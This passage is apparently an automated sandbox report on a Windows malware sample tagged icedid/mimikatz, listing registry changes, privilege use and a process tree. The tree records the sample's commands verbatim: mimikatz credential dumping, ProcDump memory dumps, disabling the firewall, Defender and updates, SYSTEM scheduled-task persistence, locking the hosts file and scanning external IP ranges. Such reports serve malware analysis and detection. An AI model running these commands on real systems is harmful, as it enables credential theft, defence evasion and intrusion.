\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump veceiebei.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" veceiebei.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" veceiebei.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump veceiebei.exe -
Modifies registry class 14 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ zienqub.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ = "txtfile" zienqub.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbe\ zienqub.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ zienqub.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ = "txtfile" zienqub.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ zienqub.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ = "txtfile" zienqub.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ = "txtfile" zienqub.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ zienqub.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.VBE\ = "txtfile" zienqub.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ = "txtfile" zienqub.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ zienqub.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ = "txtfile" zienqub.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ zienqub.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
pid Process 2116 PING.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1732 zienqub.exe 1732 zienqub.exe 1732 zienqub.exe 1732 zienqub.exe 1732 zienqub.exe 1732 zienqub.exe 1732 zienqub.exe 1732 zienqub.exe 1732 zienqub.exe 1732 zienqub.exe 1732 zienqub.exe 1732 zienqub.exe 1732 zienqub.exe 1732 zienqub.exe 1732 zienqub.exe 1732 zienqub.exe 1732 zienqub.exe 1732 zienqub.exe 1732 zienqub.exe 1732 zienqub.exe 1732 zienqub.exe 1732 zienqub.exe 1732 zienqub.exe 1732 zienqub.exe 1732 zienqub.exe 1732 zienqub.exe 1732 zienqub.exe 1732 zienqub.exe 1732 zienqub.exe 1732 zienqub.exe 1732 zienqub.exe 1732 zienqub.exe 1732 zienqub.exe 1732 zienqub.exe 1732 zienqub.exe 1732 zienqub.exe 1732 zienqub.exe 1732 zienqub.exe 1732 zienqub.exe 1732 zienqub.exe 1732 zienqub.exe 1732 zienqub.exe 1732 zienqub.exe 1732 zienqub.exe 1732 zienqub.exe 1732 zienqub.exe 1732 zienqub.exe 1732 zienqub.exe 1732 zienqub.exe 1732 zienqub.exe 1732 zienqub.exe 1732 zienqub.exe 1732 zienqub.exe 1732 zienqub.exe 1732 zienqub.exe 1732 zienqub.exe 1732 zienqub.exe 1732 zienqub.exe 1732 zienqub.exe 1732 zienqub.exe 1732 zienqub.exe 1732 zienqub.exe 1732 zienqub.exe 1732 zienqub.exe -
Suspicious behavior: LoadsDriver 15 IoCs
pid Process 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found -
Suspicious behavior: RenamesItself 1 IoCs
pid Process 2628 2024-05-01_a59bf0c817acd5e557d215d7a51e211e_hacktools_icedid_mimikatz.exe -
Suspicious use of AdjustPrivilegeToken 21 IoCs
description pid Process Token: SeDebugPrivilege 2628 2024-05-01_a59bf0c817acd5e557d215d7a51e211e_hacktools_icedid_mimikatz.exe Token: SeDebugPrivilege 1920 zienqub.exe Token: SeDebugPrivilege 1732 zienqub.exe Token: SeDebugPrivilege 3920 vfshost.exe Token: SeDebugPrivilege 3668 veceiebei.exe Token: SeLockMemoryPrivilege 4132 hnembi.exe Token: SeLockMemoryPrivilege 4132 hnembi.exe Token: SeDebugPrivilege 3104 veceiebei.exe Token: SeDebugPrivilege 5032 veceiebei.exe Token: SeDebugPrivilege 4100 veceiebei.exe Token: SeDebugPrivilege 3188 veceiebei.exe Token: SeDebugPrivilege 4024 veceiebei.exe Token: SeDebugPrivilege 3416 veceiebei.exe Token: SeDebugPrivilege 3988 veceiebei.exe Token: SeDebugPrivilege 3312 veceiebei.exe Token: SeDebugPrivilege 2572 veceiebei.exe Token: SeDebugPrivilege 3412 veceiebei.exe Token: SeDebugPrivilege 4452 veceiebei.exe Token: SeDebugPrivilege 1132 veceiebei.exe Token: SeDebugPrivilege 4696 veceiebei.exe Token: SeDebugPrivilege 116 veceiebei.exe -
Suspicious use of SetWindowsHookEx 12 IoCs
pid Process 2628 2024-05-01_a59bf0c817acd5e557d215d7a51e211e_hacktools_icedid_mimikatz.exe 2628 2024-05-01_a59bf0c817acd5e557d215d7a51e211e_hacktools_icedid_mimikatz.exe 1920 zienqub.exe 1920 zienqub.exe 1732 zienqub.exe 1732 zienqub.exe 4828 xohudmc.exe 4840 dipzew.exe 712 zienqub.exe 712 zienqub.exe 5348 zienqub.exe 5348 zienqub.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2628 wrote to memory of 5068 2628 2024-05-01_a59bf0c817acd5e557d215d7a51e211e_hacktools_icedid_mimikatz.exe 82 PID 2628 wrote to memory of 5068 2628 2024-05-01_a59bf0c817acd5e557d215d7a51e211e_hacktools_icedid_mimikatz.exe 82 PID 2628 wrote to memory of 5068 2628 2024-05-01_a59bf0c817acd5e557d215d7a51e211e_hacktools_icedid_mimikatz.exe 82 PID 5068 wrote to memory of 2116 5068 cmd.exe 84 PID 5068 wrote to memory of 2116 5068 cmd.exe 84 PID 5068 wrote to memory of 2116 5068 cmd.exe 84 PID 5068 wrote to memory of 1920 5068 cmd.exe 90 PID 5068 wrote to memory of 1920 5068 cmd.exe 90 PID 5068 wrote to memory of 1920 5068 cmd.exe 90 PID 1732 wrote to memory of 2596 1732 zienqub.exe 92 PID 1732 wrote to memory of 2596 1732 zienqub.exe 92 PID 1732 wrote to memory of 2596 1732 zienqub.exe 92 PID 2596 wrote to memory of 5104 2596 cmd.exe 94 PID 2596 wrote to memory of 5104 2596 cmd.exe 94 PID 2596 wrote to memory of 5104 2596 cmd.exe 94 PID 2596 wrote to memory of 3084 2596 cmd.exe 95 PID 2596 wrote to memory of 3084 2596 cmd.exe 95 PID 2596 wrote to memory of 3084 2596 cmd.exe 95 PID 2596 wrote to memory of 4888 2596 cmd.exe 96 PID 2596 wrote to memory of 4888 2596 cmd.exe 96 PID 2596 wrote to memory of 4888 2596 cmd.exe 96 PID 2596 wrote to memory of 3836 2596 cmd.exe 97 PID 2596 wrote to memory of 3836 2596 cmd.exe 97 PID 2596 wrote to memory of 3836 2596 cmd.exe 97 PID 2596 wrote to memory of 1824 2596 cmd.exe 98 PID 2596 wrote to memory of 1824 2596 cmd.exe 98 PID 2596 wrote to memory of 1824 2596 cmd.exe 98 PID 2596 wrote to memory of 2136 2596 cmd.exe 99 PID 2596 wrote to memory of 2136 2596 cmd.exe 99 PID 2596 wrote to memory of 2136 2596 cmd.exe 99 PID 1732 wrote to memory of 4772 1732 zienqub.exe 100 PID 1732 wrote to memory of 4772 1732 zienqub.exe 100 PID 1732 wrote to memory of 4772 1732 zienqub.exe 100 PID 1732 wrote to memory of 3784 1732 zienqub.exe 102 PID 1732 wrote to memory of 3784 1732 zienqub.exe 102 PID 1732 wrote to memory of 3784 1732 zienqub.exe 102 PID 1732 wrote to memory of 216 1732 zienqub.exe 104 PID 1732 wrote to memory of 216 1732 zienqub.exe 104 PID 1732 wrote to memory of 216 1732 zienqub.exe 104 PID 1732 wrote to memory of 2396 1732 zienqub.exe 106 PID 1732 wrote to memory of 2396 1732 zienqub.exe 106 PID 1732 wrote to memory of 2396 1732 zienqub.exe 106 PID 2396 wrote to memory of 2416 2396 cmd.exe 108 PID 2396 wrote to memory of 2416 2396 cmd.exe 108 PID 2396 wrote to memory of 2416 2396 cmd.exe 108 PID 2416 wrote to memory of 4308 2416 wpcap.exe 109 PID 2416 wrote to memory of 4308 2416 wpcap.exe 109 PID 2416 wrote to memory of 4308 2416 wpcap.exe 109 PID 4308 wrote to memory of 3304 4308 net.exe 111 PID 4308 wrote to memory of 3304 4308 net.exe 111 PID 4308 wrote to memory of 3304 4308 net.exe 111 PID 2416 wrote to memory of 4268 2416 wpcap.exe 112 PID 2416 wrote to memory of 4268 2416 wpcap.exe 112 PID 2416 wrote to memory of 4268 2416 wpcap.exe 112 PID 4268 wrote to memory of 3112 4268 net.exe 114 PID 4268 wrote to memory of 3112 4268 net.exe 114 PID 4268 wrote to memory of 3112 4268 net.exe 114 PID 2416 wrote to memory of 1816 2416 wpcap.exe 115 PID 2416 wrote to memory of 1816 2416 wpcap.exe 115 PID 2416 wrote to memory of 1816 2416 wpcap.exe 115 PID 1816 wrote to memory of 1716 1816 net.exe 117 PID 1816 wrote to memory of 1716 1816 net.exe 117 PID 1816 wrote to memory of 1716 1816 net.exe 117 PID 2416 wrote to memory of 2228 2416 wpcap.exe 118
Processes
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:2088
-
C:\Windows\TEMP\mknctelvt\hnembi.exe"C:\Windows\TEMP\mknctelvt\hnembi.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4132
-
-
C:\Users\Admin\AppData\Local\Temp\2024-05-01_a59bf0c817acd5e557d215d7a51e211e_hacktools_icedid_mimikatz.exe"C:\Users\Admin\AppData\Local\Temp\2024-05-01_a59bf0c817acd5e557d215d7a51e211e_hacktools_icedid_mimikatz.exe"1⤵
- Drops file in Windows directory
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2628 -
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\meqvcrkb\zienqub.exe2⤵
- Suspicious use of WriteProcessMemory
PID:5068 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- Runs ping.exe
PID:2116
-
-
C:\Windows\meqvcrkb\zienqub.exeC:\Windows\meqvcrkb\zienqub.exe3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:1920
-
-
-
C:\Windows\meqvcrkb\zienqub.exeC:\Windows\meqvcrkb\zienqub.exe1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Sets file execution options in registry
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1732 -
C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵
- Suspicious use of WriteProcessMemory
PID:2596 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:5104
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵PID:3084
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:4888
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵PID:3836
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:1824
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵PID:2136
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static del all2⤵PID:4772
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add policy name=Bastards description=FuckingBastards2⤵PID:3784
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=BastardsList action=block2⤵PID:216
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\ezlvzsbsa\himbnbstt\wpcap.exe /S2⤵
- Suspicious use of WriteProcessMemory
PID:2396 -
C:\Windows\ezlvzsbsa\himbnbstt\wpcap.exeC:\Windows\ezlvzsbsa\himbnbstt\wpcap.exe /S3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:2416 -
C:\Windows\SysWOW64\net.exenet stop "Boundary Meter"4⤵
- Suspicious use of WriteProcessMemory
PID:4308 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "Boundary Meter"5⤵PID:3304
-
-
-
C:\Windows\SysWOW64\net.exenet stop "TrueSight Meter"4⤵
- Suspicious use of WriteProcessMemory
PID:4268 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "TrueSight Meter"5⤵PID:3112
-
-
-
C:\Windows\SysWOW64\net.exenet stop npf4⤵
- Suspicious use of WriteProcessMemory
PID:1816 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop npf5⤵PID:1716
-
-
-
C:\Windows\SysWOW64\net.exenet start npf4⤵PID:2228
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf5⤵PID:5060
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵PID:4328
-
C:\Windows\SysWOW64\net.exenet start npf3⤵PID:3292
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵PID:3188
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵PID:1320
-
C:\Windows\SysWOW64\net.exenet start npf3⤵PID:3892
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵PID:4072
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\ezlvzsbsa\himbnbstt\lccciibvb.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\ezlvzsbsa\himbnbstt\Scant.txt2⤵PID:3752
-
C:\Windows\ezlvzsbsa\himbnbstt\lccciibvb.exeC:\Windows\ezlvzsbsa\himbnbstt\lccciibvb.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\ezlvzsbsa\himbnbstt\Scant.txt3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:740
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\ezlvzsbsa\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\ezlvzsbsa\Corporate\log.txt2⤵
- Drops file in Windows directory
PID:1776 -
C:\Windows\ezlvzsbsa\Corporate\vfshost.exeC:\Windows\ezlvzsbsa\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3920
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "feqvbnlvq" /ru system /tr "cmd /c C:\Windows\ime\zienqub.exe"2⤵PID:4216
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:4228
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "feqvbnlvq" /ru system /tr "cmd /c C:\Windows\ime\zienqub.exe"3⤵
- Creates scheduled task(s)
PID:368
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "crtfhvbif" /ru system /tr "cmd /c echo Y|cacls C:\Windows\meqvcrkb\zienqub.exe /p everyone:F"2⤵PID:5112
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:3516
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "crtfhvbif" /ru system /tr "cmd /c echo Y|cacls C:\Windows\meqvcrkb\zienqub.exe /p everyone:F"3⤵
- Creates scheduled task(s)
PID:4520
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "ezibhbgat" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\mknctelvt\hnembi.exe /p everyone:F"2⤵PID:4868
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:464
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "ezibhbgat" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\mknctelvt\hnembi.exe /p everyone:F"3⤵
- Creates scheduled task(s)
PID:1072
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP2⤵PID:1920
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP2⤵PID:4136
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵PID:1220
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵PID:2232
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP2⤵PID:3156
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP2⤵PID:4944
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵PID:2344
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵PID:4392
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP2⤵PID:4100
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP2⤵PID:5060
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵PID:1240
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵PID:2628
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop SharedAccess2⤵PID:3416
-
C:\Windows\SysWOW64\net.exenet stop SharedAccess3⤵PID:1780
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SharedAccess4⤵PID:4036
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c netsh firewall set opmode mode=disable2⤵PID:4288
-
C:\Windows\SysWOW64\netsh.exenetsh firewall set opmode mode=disable3⤵
- Modifies Windows Firewall
PID:2096
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c netsh Advfirewall set allprofiles state off2⤵PID:3312
-
C:\Windows\SysWOW64\netsh.exenetsh Advfirewall set allprofiles state off3⤵
- Modifies Windows Firewall
PID:4996
-
-
-
C:\Windows\TEMP\ezlvzsbsa\veceiebei.exeC:\Windows\TEMP\ezlvzsbsa\veceiebei.exe -accepteula -mp 784 C:\Windows\TEMP\ezlvzsbsa\784.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:3668
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop MpsSvc2⤵PID:3412
-
C:\Windows\SysWOW64\net.exenet stop MpsSvc3⤵PID:5044
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MpsSvc4⤵PID:4216
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop WinDefend2⤵PID:4180
-
C:\Windows\SysWOW64\net.exenet stop WinDefend3⤵PID:4660
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop WinDefend4⤵PID:5064
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop wuauserv2⤵PID:4532
-
C:\Windows\SysWOW64\net.exenet stop wuauserv3⤵PID:3552
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop wuauserv4⤵PID:2136
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config MpsSvc start= disabled2⤵PID:4084
-
C:\Windows\SysWOW64\sc.exesc config MpsSvc start= disabled3⤵
- Launches sc.exe
PID:1072
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config SharedAccess start= disabled2⤵PID:4080
-
C:\Windows\SysWOW64\sc.exesc config SharedAccess start= disabled3⤵
- Launches sc.exe
PID:464
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config WinDefend start= disabled2⤵PID:2612
-
C:\Windows\SysWOW64\sc.exesc config WinDefend start= disabled3⤵
- Launches sc.exe
PID:228
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config wuauserv start= disabled2⤵PID:608
-
C:\Windows\SysWOW64\sc.exesc config wuauserv start= disabled3⤵
- Launches sc.exe
PID:2572
-
-
-
C:\Windows\TEMP\xohudmc.exeC:\Windows\TEMP\xohudmc.exe2⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetWindowsHookEx
PID:4828
-
-
C:\Windows\TEMP\ezlvzsbsa\veceiebei.exeC:\Windows\TEMP\ezlvzsbsa\veceiebei.exe -accepteula -mp 336 C:\Windows\TEMP\ezlvzsbsa\336.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:3104
-
-
C:\Windows\TEMP\ezlvzsbsa\veceiebei.exeC:\Windows\TEMP\ezlvzsbsa\veceiebei.exe -accepteula -mp 2088 C:\Windows\TEMP\ezlvzsbsa\2088.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:5032
-
-
C:\Windows\TEMP\ezlvzsbsa\veceiebei.exeC:\Windows\TEMP\ezlvzsbsa\veceiebei.exe -accepteula -mp 2500 C:\Windows\TEMP\ezlvzsbsa\2500.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4100
-
-
C:\Windows\TEMP\ezlvzsbsa\veceiebei.exeC:\Windows\TEMP\ezlvzsbsa\veceiebei.exe -accepteula -mp 2852 C:\Windows\TEMP\ezlvzsbsa\2852.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:3188
-
-
C:\Windows\TEMP\ezlvzsbsa\veceiebei.exeC:\Windows\TEMP\ezlvzsbsa\veceiebei.exe -accepteula -mp 2868 C:\Windows\TEMP\ezlvzsbsa\2868.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4024
-
-
C:\Windows\TEMP\ezlvzsbsa\veceiebei.exeC:\Windows\TEMP\ezlvzsbsa\veceiebei.exe -accepteula -mp 3168 C:\Windows\TEMP\ezlvzsbsa\3168.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:3416
-
-
C:\Windows\TEMP\ezlvzsbsa\veceiebei.exeC:\Windows\TEMP\ezlvzsbsa\veceiebei.exe -accepteula -mp 3824 C:\Windows\TEMP\ezlvzsbsa\3824.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:3988
-
-
C:\Windows\TEMP\ezlvzsbsa\veceiebei.exeC:\Windows\TEMP\ezlvzsbsa\veceiebei.exe -accepteula -mp 3952 C:\Windows\TEMP\ezlvzsbsa\3952.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:3312
-
-
C:\Windows\TEMP\ezlvzsbsa\veceiebei.exeC:\Windows\TEMP\ezlvzsbsa\veceiebei.exe -accepteula -mp 4016 C:\Windows\TEMP\ezlvzsbsa\4016.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2572
-
-
C:\Windows\TEMP\ezlvzsbsa\veceiebei.exeC:\Windows\TEMP\ezlvzsbsa\veceiebei.exe -accepteula -mp 1044 C:\Windows\TEMP\ezlvzsbsa\1044.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:3412
-
-
C:\Windows\TEMP\ezlvzsbsa\veceiebei.exeC:\Windows\TEMP\ezlvzsbsa\veceiebei.exe -accepteula -mp 4684 C:\Windows\TEMP\ezlvzsbsa\4684.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4452
-
-
C:\Windows\TEMP\ezlvzsbsa\veceiebei.exeC:\Windows\TEMP\ezlvzsbsa\veceiebei.exe -accepteula -mp 1296 C:\Windows\TEMP\ezlvzsbsa\1296.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1132
-
-
C:\Windows\TEMP\ezlvzsbsa\veceiebei.exeC:\Windows\TEMP\ezlvzsbsa\veceiebei.exe -accepteula -mp 1948 C:\Windows\TEMP\ezlvzsbsa\1948.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4696
-
-
C:\Windows\TEMP\ezlvzsbsa\veceiebei.exeC:\Windows\TEMP\ezlvzsbsa\veceiebei.exe -accepteula -mp 1172 C:\Windows\TEMP\ezlvzsbsa\1172.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:116
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c C:\Windows\ezlvzsbsa\himbnbstt\scan.bat2⤵PID:3616
-
C:\Windows\ezlvzsbsa\himbnbstt\nlmvblguv.exenlmvblguv.exe TCP 191.101.0.1 191.101.255.255 7001 512 /save3⤵
- Executes dropped EXE
- Drops file in Windows directory
PID:544
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵PID:5176
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:1016
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵PID:5484
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:4128
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵PID:6092
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:5376
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵PID:4472
-
-
-
C:\Windows\SysWOW64\dipzew.exeC:\Windows\SysWOW64\dipzew.exe1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4840
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵PID:3448
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\meqvcrkb\zienqub.exe /p everyone:F1⤵PID:4660
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵PID:4564
-
-
C:\Windows\system32\cacls.execacls C:\Windows\meqvcrkb\zienqub.exe /p everyone:F2⤵PID:2304
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c C:\Windows\ime\zienqub.exe1⤵PID:4808
-
C:\Windows\ime\zienqub.exeC:\Windows\ime\zienqub.exe2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:712
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\mknctelvt\hnembi.exe /p everyone:F1⤵PID:2252
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵PID:4596
-
-
C:\Windows\system32\cacls.execacls C:\Windows\TEMP\mknctelvt\hnembi.exe /p everyone:F2⤵PID:1740
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵PID:2428
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵PID:4424
-
